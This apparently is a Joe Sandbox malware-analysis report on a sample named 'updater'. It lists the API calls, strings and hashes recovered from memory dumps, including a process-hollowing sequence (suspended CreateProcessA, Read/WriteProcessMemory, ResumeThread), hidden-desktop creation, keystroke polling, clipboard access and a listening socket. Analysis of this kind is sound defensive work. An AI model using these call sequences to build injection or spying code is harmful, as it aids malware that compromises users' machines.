X;, xrefs: 0032D4C3
UTF16), xrefs: 00361A60
LF), xrefs: 00361C35
ANY), xrefs: 00361C6F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID: Z;$#V2$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$V;$W;$X;
API String ID: 0-1366453118
Opcode ID: 48f3e46092f74724b1c68c4b01e543c0843394f0e6972aedb8ec0ff2d1130296
Instruction ID: 13f2eb420e01efc9b065724b4b9cc46979c13c35da0762243339c4dd09c41c74
Opcode Fuzzy Hash: 48f3e46092f74724b1c68c4b01e543c0843394f0e6972aedb8ec0ff2d1130296
Instruction Fuzzy Hash: 7A72B275E002299BDF26CF59D8807BEB7B5FF48310F15816AE849EB684E7709D81CB90

Function 003688CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00368E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00368E3C
Part of subcall function 00368E20: GetLastError.KERNEL32(?,00368900,?,?,?), ref: 00368E46
Part of subcall function 00368E20: GetProcessHeap.KERNEL32(00000008,?,?,00368900,?,?,?), ref: 00368E55
Part of subcall function 00368E20: HeapAlloc.KERNEL32(00000000,?,00368900,?,?,?), ref: 00368E5C
Part of subcall function 00368E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00368E73

Part of subcall function 00368EBD: GetProcessHeap.KERNEL32(00000008,00368916,00000000,00000000,?,00368916,?), ref: 00368EC9
Part of subcall function 00368EBD: HeapAlloc.KERNEL32(00000000,?,00368916,?), ref: 00368ED0
Part of subcall function 00368EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00368916,?), ref: 00368EE1

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00368931
_memset.LIBCMT ref: 00368946
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00368965
GetLengthSid.ADVAPI32(?), ref: 00368976
GetAce.ADVAPI32(?,00000000,?), ref: 003689B3
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003689CF
GetLengthSid.ADVAPI32(?), ref: 003689EC
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 003689FB
HeapAlloc.KERNEL32(00000000), ref: 00368A02
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00368A23
CopySid.ADVAPI32(00000000), ref: 00368A2A
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00368A5B
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00368A81
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00368A95

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: deb7fb0923a29c1749b8e5ff89e6bf8fdeb6138a87f413506ceecdd83807636a
Instruction ID: 276953895f18733f534d635b3e387a11bb610a177c50f1cdf6fd0e20ed967a03
Opcode Fuzzy Hash: deb7fb0923a29c1749b8e5ff89e6bf8fdeb6138a87f413506ceecdd83807636a
Instruction Fuzzy Hash: DA613A75900209BFDF06DFA5DC45EFEBBB9FF09304F04822AE915A6290DB759A05CB60

Function 016EBA39 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 176sleepprocessnativeCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,016EBC7F), ref: 016EBAA1
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 016EBB6E
NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 016EBB86
ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 016EBBAE
ReadProcessMemory.KERNEL32(?,?,?,00001000,?,?,?,?,00000004,?,00000000,00000000,00000000,00000000,00000000,00000004), ref: 016EBBDD
WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 016EBC2F
ResumeThread.KERNEL32(?,?,?,00000000,00000000,?), ref: 016EBC38
Sleep.KERNEL32(000001F4,?,?,?,00000000,00000000,?), ref: 016EBC42
GetTickCount.KERNEL32 ref: 016EBC47

Strings

D, xrefs: 016EBB3A

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Process$Memory$Read$CountCreateCurrentInformationQueryResumeSleepThreadTickWrite
String ID: D
API String ID: 4190092080-2746444292
Opcode ID: df073526675d5468c691b498d57f2f521df321501e0362428baba76d392dba0d
Instruction ID: edd56c75b17acf211ba7ab098314cbe5dc2195be701e107ffca51017851c21b7
Opcode Fuzzy Hash: df073526675d5468c691b498d57f2f521df321501e0362428baba76d392dba0d
Instruction Fuzzy Hash: 9261FAB1E0020DAFDB00EBA8CC91EDEB7F9EF58300F544069E108E7244DB74AA858B65

Function 00390A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0039147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0039040D,?,?), ref: 00391491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00390B0C

Part of subcall function 00314D37: __itow.LIBCMT ref: 00314D62
Part of subcall function 00314D37: __swprintf.LIBCMT ref: 00314DAC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00390BAB
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00390C43
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00390E82
RegCloseKey.ADVAPI32(00000000), ref: 00390E8F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: eb92088db809c94bfc67d66870644f59dc40b4f65a4cd72f75651a183bb1c47e
Instruction ID: f8c5d816f16feb9bde0189f3b73ab4b075fff54166e07efa7d2928e09d970c8e
Opcode Fuzzy Hash: eb92088db809c94bfc67d66870644f59dc40b4f65a4cd72f75651a183bb1c47e
Instruction Fuzzy Hash: EAE16D71604210AFCB1ADF28C991E6BBBE8EF89714F05896DF849DB261DB30ED41CB51

Function 0031F6A0 Relevance: 16.9, APIs: 1, Strings: 8, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 0031FA80
VUUU, xrefs: 0031FA4D
VUUU, xrefs: 00356225
ERCP, xrefs: 0031F77F
#V2, xrefs: 0031FEE4, 0035688C
V;, xrefs: 0031F9CC
V;, xrefs: 0031F8F2
VUUU, xrefs: 0031FA3B

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID:
String ID: #V2$ERCP$VUUU$VUUU$VUUU$VUUU$V;$V;
API String ID: 0-317341876
Opcode ID: e448e2ac1ca64e2ff8f80c33e1df275de0eb0f63d8e4858b3f9ea98af5635def
Instruction ID: 5e9ad8825ee3b8f3ff5a99388a03b74df2c2be1792897d6edf7bcb3a4b601f21
Opcode Fuzzy Hash: e448e2ac1ca64e2ff8f80c33e1df275de0eb0f63d8e4858b3f9ea98af5635def
Instruction Fuzzy Hash: FAA2AE70E0021ACFDF2ACF18C851BEDB7B1BB58315F5581AAD81AA7690D7309EC5DB90

Function 00370508 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00370530
GetAsyncKeyState.USER32(000000A0), ref: 003705B1
GetKeyState.USER32(000000A0), ref: 003705CC
GetAsyncKeyState.USER32(000000A1), ref: 003705E6
GetKeyState.USER32(000000A1), ref: 003705FB
GetAsyncKeyState.USER32(00000011), ref: 00370613
GetKeyState.USER32(00000011), ref: 00370625
GetAsyncKeyState.USER32(00000012), ref: 0037063D
GetKeyState.USER32(00000012), ref: 0037064F
GetAsyncKeyState.USER32(0000005B), ref: 00370667
GetKeyState.USER32(0000005B), ref: 00370679

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: a3c333dd2409c3c71a2458174b4dbd713940debcd0405ae039e4a9a3fb674185
Instruction ID: c30159c91a943c2a93dd66aeaf67a839393173692a1f4260a70ad7e4bd804a38
Opcode Fuzzy Hash: a3c333dd2409c3c71a2458174b4dbd713940debcd0405ae039e4a9a3fb674185
Instruction Fuzzy Hash: 2441D8709087C9ADFF3B976488143B5BEA0AB53314F09C05DD5C9466C1EBAC99D4CF92

Function 0037443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00374451
__swprintf.LIBCMT ref: 0037445E

Part of subcall function 003338C8: __woutput_l.LIBCMT ref: 00333921

FindResourceW.KERNEL32(?,?,0000000E), ref: 00374488
LoadResource.KERNEL32(?,00000000), ref: 00374494
LockResource.KERNEL32(00000000), ref: 003744A1
FindResourceW.KERNEL32(?,?,00000003), ref: 003744C1
LoadResource.KERNEL32(?,00000000), ref: 003744D3
SizeofResource.KERNEL32(?,00000000), ref: 003744E2
LockResource.KERNEL32(?), ref: 003744EE
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 0037454F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: a86bb46b0eafabf47c980cc9298c145b9e7083ca602a3291831fb0fe60c72557
Instruction ID: 3d019757c8036b143d8abea8f50f0793f014233b1eff43c37524dbc5b5a4baf2
Opcode Fuzzy Hash: a86bb46b0eafabf47c980cc9298c145b9e7083ca602a3291831fb0fe60c72557
Instruction Fuzzy Hash: DD31A37150121AABDB279F61ED48EBB7BADFF0A301F008815F915D6150E734E920DB60

Function 00384830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00384857
EmptyClipboard.USER32 ref: 0038485D
GlobalAlloc.KERNEL32(00000002,?), ref: 00384872
CloseClipboard.USER32 ref: 00384911

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 80665f00d3bd62e379fea7d514aaf84d584c71922e4733eabfe817b7572b217a
Instruction ID: 807d0750316b36f16f160838c2608afe87951024f0d95d22c5aa766dd4a16701
Opcode Fuzzy Hash: 80665f00d3bd62e379fea7d514aaf84d584c71922e4733eabfe817b7572b217a
Instruction Fuzzy Hash: C421B2312013119FDB17AF20EC49B6E7BACEF49725F01805AF9069B2B1DB34AD40CB94

Function 00320BE0 Relevance: 14.3, APIs: 9, Instructions: 843COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00320D21
_memmove.LIBCMT ref: 00320F54
_memmove.LIBCMT ref: 0035EDCF
_memmove.LIBCMT ref: 0035EEDF

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 041b8501c9afd71849906d91b5305daebf385cdc0031861fbb34d0434240c3b2
Instruction ID: b361a6398e5579e90a3df5531cfe10698669c33a41bcf5f3c924e9be9a819044
Opcode Fuzzy Hash: 041b8501c9afd71849906d91b5305daebf385cdc0031861fbb34d0434240c3b2
Instruction Fuzzy Hash: 5E62D671E00229DFCF1ADFA4E981ABEB7B5FF48300F104529E816EB251EB359955CB90

Function 016E85B1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 167processsynchronizationCOMMON

Download Yara Rule

APIs

CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 016E867B
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,016E87AA), ref: 016E86BC
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 016E86F9
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,016E87AA), ref: 016E8732
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 016E876A
WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,016E87AA), ref: 016E877D

Strings

D, xrefs: 016E864C

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID: Create$Process$DesktopObjectSingleWait
String ID: D
API String ID: 183768610-2746444292
Opcode ID: 538bd1b0ef9f403ae81c73df2215c20cd526120b8ec1fdbaa99b0b6ac3d15b6b
Instruction ID: 04c023853c7bd80cff33e7880ee524438228507715d4787fba4ce3c56a69e0cb
Opcode Fuzzy Hash: 538bd1b0ef9f403ae81c73df2215c20cd526120b8ec1fdbaa99b0b6ac3d15b6b
Instruction Fuzzy Hash: C6510E70E4430AAFEF10DB95CD85FEDB7BABB14710F204229A514AB3D0DB746A05CB59

Function 0037FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0037FA83
FindClose.KERNEL32(00000000), ref: 0037FB96

Part of subcall function 003152B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 003152E6

Sleep.KERNEL32(0000000A), ref: 0037FAB3
_wcscmp.LIBCMT ref: 0037FAC7
_wcscmp.LIBCMT ref: 0037FAE2
FindNextFileW.KERNEL32(?,?), ref: 0037FB80

Strings

*.*, xrefs: 0037FA68

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
String ID: *.*
API String ID: 2185952417-438819550
Opcode ID: ffe51e08b3ef478ab51b6bec3f8d943abf0e24997a040b294b19451adc5e35ab
Instruction ID: 75fe18c6aac76636c654682b3e85718836bba5820426ce03efee6e8e593e17b4
Opcode Fuzzy Hash: ffe51e08b3ef478ab51b6bec3f8d943abf0e24997a040b294b19451adc5e35ab
Instruction Fuzzy Hash: 8541947194021ADFCF26DF64CC55AEEBBB8FF15310F148466E818A6291E7349E44CF90

Function 00374005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00330284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00322A58,?,00008000), ref: 003302A4

Part of subcall function 00374FEC: GetFileAttributesW.KERNEL32(?,00373BFE), ref: 00374FED

FindFirstFileW.KERNEL32(?,?), ref: 0037407C
DeleteFileW.KERNEL32(?,?,?,?), ref: 003740CC
FindNextFileW.KERNEL32(00000000,00000010), ref: 003740DD
FindClose.KERNEL32(00000000), ref: 003740F4
FindClose.KERNEL32(00000000), ref: 003740FD

Strings

\*.*, xrefs: 0037404E

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
String ID: \*.*
API String ID: 2649000838-1173974218
Opcode ID: 5e62c9a4ce02519c05070508990c7695483a98122d19c5a7358fe462aaf1a5d0
Instruction ID: a500d2471b88a9845d8f4894e0d648d98c56c32af31d50164b8462321ee6d15b
Opcode Fuzzy Hash: 5e62c9a4ce02519c05070508990c7695483a98122d19c5a7358fe462aaf1a5d0
Instruction Fuzzy Hash: 363181310083959BC316EF60D9959AFB7ACBEA2304F444E1DF4E586191DB24EA09C7A2

Function 00375778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00369399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 003693E3
Part of subcall function 00369399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00369410
Part of subcall function 00369399: GetLastError.KERNEL32 ref: 0036941D

ExitWindowsEx.USER32(?,00000000), ref: 003757B4

Strings

SeShutdownPrivilege, xrefs: 00375784
, xrefs: 003757A2
@, xrefs: 003757A7

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 224c0ba635f7e89476039ee5f788cecfa7e7a977b7cce70d8012042562d98e42
Instruction ID: 1af75b85b31f74891703a06af947ced90bf6a1f73d4b47e01aa07677f2be94f6
Opcode Fuzzy Hash: 224c0ba635f7e89476039ee5f788cecfa7e7a977b7cce70d8012042562d98e42
Instruction Fuzzy Hash: 1E01F731790752EAE77F62649CCBBBB735CAB05740F258529F81BE60D2E9985C008160

Function 0031E6F0 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON

Download Yara Rule

Strings

#V2, xrefs: 0031E9E2

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003C6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671795941.00000000003D0000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671853604.00000000003D9000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_310000_updater.jbxd

Similarity

API ID: __itow__swprintf
String ID: #V2
API String ID: 674341424-3783035641
Opcode ID: d8cc7725fe3d239572c3a05738c4e097616d802be49016b0f62307600a461ccf
Instruction ID: 8a5325684482969ad80663feba013b16a8565b2ab3e8b63a42e4762766d38df9
Opcode Fuzzy Hash: d8cc7725fe3d239572c3a05738c4e097616d802be49016b0f62307600a461ccf
Instruction Fuzzy Hash: 0122B0716083019FD72ADF24C891BAFB7E4BF88714F10491DF8969B291DB71E984CB92

Function 016EB391 Relevance: 9.2, Strings: 7, Instructions: 450COMMON

Download Yara Rule

Strings

GetP, xrefs: 016EB4A3
OpenProcess, xrefs: 016EB6A3, 016EB6A9
LoadLibraryA, xrefs: 016EB687, 016EB68D
VirtualAlloc, xrefs: 016EB697, 016EB69A
CloseHandle, xrefs: 016EB6C3, 016EB6C9
ddre, xrefs: 016EB4AE
ReadProcessMemory, xrefs: 016EB6B3, 016EB6B9

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID:
String ID: CloseHandle$GetP$LoadLibraryA$OpenProcess$ReadProcessMemory$VirtualAlloc$ddre
API String ID: 0-74115134
Opcode ID: 4cd9f9ecbeb5a7e973a920515f3bfac52f909a65e1fd192fa73b7d5d25a518c3
Instruction ID: 4e597cccf86e6f4a6c9cdacc2903698ca1d1ed883db80aee5e641e54a86077c0
Opcode Fuzzy Hash: 4cd9f9ecbeb5a7e973a920515f3bfac52f909a65e1fd192fa73b7d5d25a518c3
Instruction Fuzzy Hash: 2D222670E04298DFDB11CBACC885B9EBBF5AF19304F184198E588AB352C375AE54CF65

Function 016EB38A Relevance: 9.1, Strings: 7, Instructions: 361COMMON

Download Yara Rule

Strings

GetP, xrefs: 016EB4A3
OpenProcess, xrefs: 016EB6A3, 016EB6A9
LoadLibraryA, xrefs: 016EB687, 016EB68D
VirtualAlloc, xrefs: 016EB697, 016EB69A
CloseHandle, xrefs: 016EB6C3, 016EB6C9
ddre, xrefs: 016EB4AE
ReadProcessMemory, xrefs: 016EB6B3, 016EB6B9

Memory Dump Source

Source File: 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_16cd000_updater.jbxd

Similarity

API ID:
String ID: CloseHandle$GetP$LoadLibraryA$OpenProcess$ReadProcessMemory$VirtualAlloc$ddre
API String ID: 0-74115134
Opcode ID: ffe065cff04187cf7c366c183701bd7d6a19cbd407cee7044139b06045a703bf
Instruction ID: b441efcde2680723a04d8923c2f801e1649fcbf7b52dc040c87cea7784f9d6e3
Opcode Fuzzy Hash: ffe065cff04187cf7c366c183701bd7d6a19cbd407cee7044139b06045a703bf
Instruction Fuzzy Hash: 6D021B70E04298DFEB11CBACC885B9DBBF5AF19304F184099E588AB352C3B59E54CF65

Function 0038696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006), ref: 003869C7
WSAGetLastError.WSOCK32(00000000), ref: 003869D6
bind.WSOCK32(00000000,?,00000010), ref: 003869F2
listen.WSOCK32(00000000,00000005), ref: 00386A01
WSAGetLastError.WSOCK32(00000000), ref: 00386A1B
closesocket.WSOCK32(00000000), ref: 00386A2F

Memory Dump Source

Source File: 00000014.00000002.1670137153.0000000000311000.00000020.00000001.01000000.00000010.sdmp, Offset: 00310000, based on PE: true

Associated: 00000014.00000002.1669650151.0000000000310000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000014.00000002.1671662580.00000000003A0000.00000002.00000001.01000000.00000010.sdmpDownload File
